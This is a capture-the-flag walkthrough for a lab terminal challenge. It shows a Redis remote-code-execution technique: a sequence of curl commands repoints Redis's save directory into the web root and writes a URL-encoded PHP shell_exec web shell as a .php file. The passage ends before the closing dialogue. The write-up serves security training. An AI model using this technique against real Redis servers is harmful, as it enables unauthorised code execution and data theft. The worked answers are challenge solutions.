Terminal - Redis Bug Hunt¶

Terminal¶

Elf: Holly Evergreen
Location: Kitchen
Related to Objective: 8

The goal of this terminal challenge is to teach you about Redis RCE. To achieve RCE, you can write PHP code to execute a command. The PHP code needs to be encoded in URL encoding. Then you can use the following queries to run the URL encoded PHP code.

curl http://localhost/maintenance.php?cmd=config,set,dir,"/var/www/html"
curl http://localhost/maintenance.php?cmd=config,set,dbfilename,test1.php
curl http://localhost/maintenance.php?cmd=set,test1,####GET INDEX.PHP URL ENCODED COMMAND####
curl http://localhost/maintenance.php?cmd=save
curl http://localhost/test1.php --output blah.txt

Here is PHP code to get index.php:

<?php
$output = shell_exec('cat index.php');
echo "<pre>$output</pre>";
?>

Use CyberChef to perform the URL encoding CyberChef.

Here is the URL encoding for the above PHP code. You need to replace ####GET INDEX.PHP URL ENCODED COMMAND#### in the above code with the following:

%3C%3Fphp%0A%24output%20%3D%20shell%5Fexec%28%27cat%20index%2Ephp%27%29%3B%0Aecho%20%22%3Cpre%3E%24output%3C%2Fpre%3E%22%3B%0A%3F%3E%0A

Run the above curl queries and to get the following:

Answer¶

Here are the answers to this terminal challenge:

curl http://localhost/maintenance.php?cmd=config,set,dir,"/var/www/html"
curl http://localhost/maintenance.php?cmd=config,set,dbfilename,test1.php
curl http://localhost/maintenance.php?cmd=set,test1,%3C%3Fphp%0A%24output%20%3D%20shell%5Fexec%28%27cat%20index%2Ephp%27%29%3B%0Aecho%20%22%3Cpre%3E%24output%3C%2Fpre%3E%22%3B%0A%3F%3E%0A
curl http://localhost/maintenance.php?cmd=save
curl http://localhost/test1.php --output blah.txt

After you solve the challenge Holly tells you the following: